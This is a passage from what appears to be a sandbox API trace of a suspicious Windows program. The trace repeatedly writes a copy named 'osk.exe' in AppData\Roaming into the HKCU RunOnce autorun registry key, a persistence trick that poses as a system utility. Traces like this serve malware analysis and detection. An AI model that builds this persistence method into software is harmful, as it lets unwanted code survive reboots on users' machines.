| out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.690] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.690] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.690] RegCloseKey (hKey=0x280) returned 0x0 [0081.690] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.690] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.690] SetTimer (hWnd=0x20280, nIDEvent=0x20c1, uElapse=0xa, lpTimerFunc=0x0) returned 0x20c1 [0081.690] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.703] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.703] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.703] KillTimer (hWnd=0x20280, uIDEvent=0x20c1) returned 1 [0081.703] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.703] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.703] IUnknown:Release (This=0x787518) returned 0x1 [0081.703] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.704] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.704] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.704] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.704] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.704] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.704] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.704] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.704] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.704] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x46 [0081.704] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.704] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x47 [0081.704] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.705] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x46 [0081.705] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.705] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.705] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.705] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.705] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.705] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.705] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.705] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.705] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.706] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.706] RegCloseKey (hKey=0x280) returned 0x0 [0081.706] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.706] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.706] SetTimer (hWnd=0x20280, nIDEvent=0x20c2, uElapse=0xa, lpTimerFunc=0x0) returned 0x20c2 [0081.706] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.718] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.718] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.718] KillTimer (hWnd=0x20280, uIDEvent=0x20c2) returned 1 [0081.718] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.718] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.719] IUnknown:Release (This=0x787518) returned 0x1 [0081.719] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.719] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.719] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.719] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.719] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.719] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.719] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.719] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.719] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.719] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x47 [0081.719] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.719] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x48 [0081.719] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.720] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x47 [0081.720] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.720] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.721] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.721] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.721] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.721] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.721] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.721] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.722] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.722] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.722] RegCloseKey (hKey=0x280) returned 0x0 [0081.722] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.722] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.722] SetTimer (hWnd=0x20280, nIDEvent=0x20c3, uElapse=0xa, lpTimerFunc=0x0) returned 0x20c3 [0081.722] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.734] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.734] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.734] KillTimer (hWnd=0x20280, uIDEvent=0x20c3) returned 1 [0081.735] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.735] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.735] IUnknown:Release (This=0x787518) returned 0x1 [0081.735] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.735] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.735] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.735] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.735] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.735] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.735] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.735] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.735] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.736] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x48 [0081.736] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.736] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x49 [0081.736] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.736] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x48 [0081.737] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.737] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.737] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.737] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.737] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.737] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.737] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.737] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 